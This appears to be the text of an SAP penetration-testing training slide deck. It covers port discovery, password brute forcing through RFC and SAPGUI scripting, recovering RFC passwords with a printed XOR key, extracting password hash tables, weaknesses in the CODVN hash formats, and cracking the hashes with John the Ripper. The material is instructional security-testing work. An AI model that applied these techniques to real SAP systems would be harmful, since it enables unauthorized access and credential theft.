LABS Service discovery. Get information. Remote password brute force. Authentication data capture (RFC/DIAG). Authorization bypass. VBA+RFC. Privileges analysis. Access to user password hashes. “Offline” password brute force. Get data from another mandant. Access to OS files. Run OS commands.
Tools Nmap RFCSDK/NWRFCSDK Vbs/Python SAP Frontend 7.20
Scenario Scan ports Get service information Mandant discovery Account brute force (RFC) Account brute force (GUI)
Port scanning Search for SAP systems http://scn.sap.com/docs/DOC-17124 • SAP DIAG - 32xx-3299 TCP • SAP RFC - 33xx-3399 TCP • ICM HTTP - 80xx TCP • Message Server HTTP -81xx • HTTP – 5xxxx OS • SSH/Telnet/Rlogin – 22/23/512-514 DBMS • Oracle 1521-1530
Automation. SAP RFCSDK. SAP RFCSDK is a library used for application development that communicate with a SAP system via SAP RFC protocol. It includes a utility for testing RFC - Startrfc.exe. It helps to integrate the system with PHP, Perl, VB, С++, Python.
SAPGUI Scripting By default, scripting enabled in SAP Frontend. Knowledge of VBS is enough for password brute force. Enable sapgui_userscripting on server side for SAP automation. You can use VBS/JScript.
SAPGUI Scripting. VBS An example how to brute force passwords via DIAG You can use function OpenConnectionByConnectionString Add credentials to appropriate fields - findById Check script results (error/no error) Display the result
Usage of Python An example how to get data from SAP structures An example how to get data from SAP tables You need RFC SDK, С/C++ compiler, NWRFC for Python Check the results (error/no error) Display the results in console or print to a file
RFC data capture Passwords are sent in encoding form Obfuscation algorithm – XOR The key for password recovery 31 3e c3 60 e1 06 4e 3f 6b 48 c8 12 f5 fc 20 3c 89 61 2f f1 ef 2e af f3 bd ec 7e 25 b6 a0 71 83 a3 ea 7f ec 09 8a 40 21
Usage of VBA An example how to get data from SAP structures An example how to get data from SAP tables You need SAP GUI or.ocx components for import Check the results (error/no error) Show the results in Excel format
Tools SAP Frontend Perl John the Ripper. Сommunity Enhanced
Privilege analysis You find an account. Try to log in If login is successful, analyze its privileges (at the first time, run transaction SA38/SE38/SE16/SE17/ST04) Check your rights and privileges via RSUSR002
Collect password hashes Tables with hashes: USR02,USH02,USRPWDHISTORY How to get data: • SE16/SE16N/SE17 • ST04/SQL Command Editor • RFC • Database Level… • OS Level/get data from a OS file Tools: SAPGUI, MIL Read Table, VBS, SQLplus ….
Vulnerabilities in hash algorithms CODVN A is an out-of-date algorithm developed by SAP – password length <=8, characters in UPPERCASE CODVN B is an out-of-date algorithm based on MD5, password length <=8, remaining part of passwords is discarded, all characters are in UPPERCASE, special characters are replaced by ^
Vulnerabilities in hash algorithms CODVN D is an out-of-date algorithm aimed to improve B algorithm: especially password reduction and the usage of special characters. CODVN E was developed to replace passwords B and D and aimed to eliminated their problems. Versions from 4.6x to 6.x include it. • SAP Note 874738 - New password hash calculation procedure (code version E)
Vulnerabilities in hash algorithms CODVN F is now the most widely used hash algorithm based on SHA1, password length is up to 40 characters, strings are converted into UTF-8 before hashing, therefore you can use almost any character. Versions starting 7.00 include it.
Vulnerabilities in hash algorithms CODVN G = B+F – firstly you can brute force a part of password of 8 characters long via B algorithm, and then use this part to brute force the password via G algorithm. Versions starting 7.00 include it.
Vulnerabilities in hash algorithms CODVN H is the most secure hash algorithm based on SHA1 with variable salt length. Versions starting 7.02 include it. CODVN I = B+F+H – the same problems G The rate of password brute force • up to 700 000 passwords per second for CODVN B • up to 300 000 passwords per second for CODVN G
John The Ripper. Community Enhanced John the Ripper 1.7.9-jumbo-5 enables analysis of hash algorithms for SAP passwords of B and F types. Password dictionaries Openwall wordlists collection full version - paid download You can parallel tasks among several CPUs.
Testing of passwords Download USR02 (fields BNAME/BCODE/PASSCODE) Create files in username:username<spaces to 40 bytes>$HASHCODE format Choose a dictionary or create your own Run john the ripper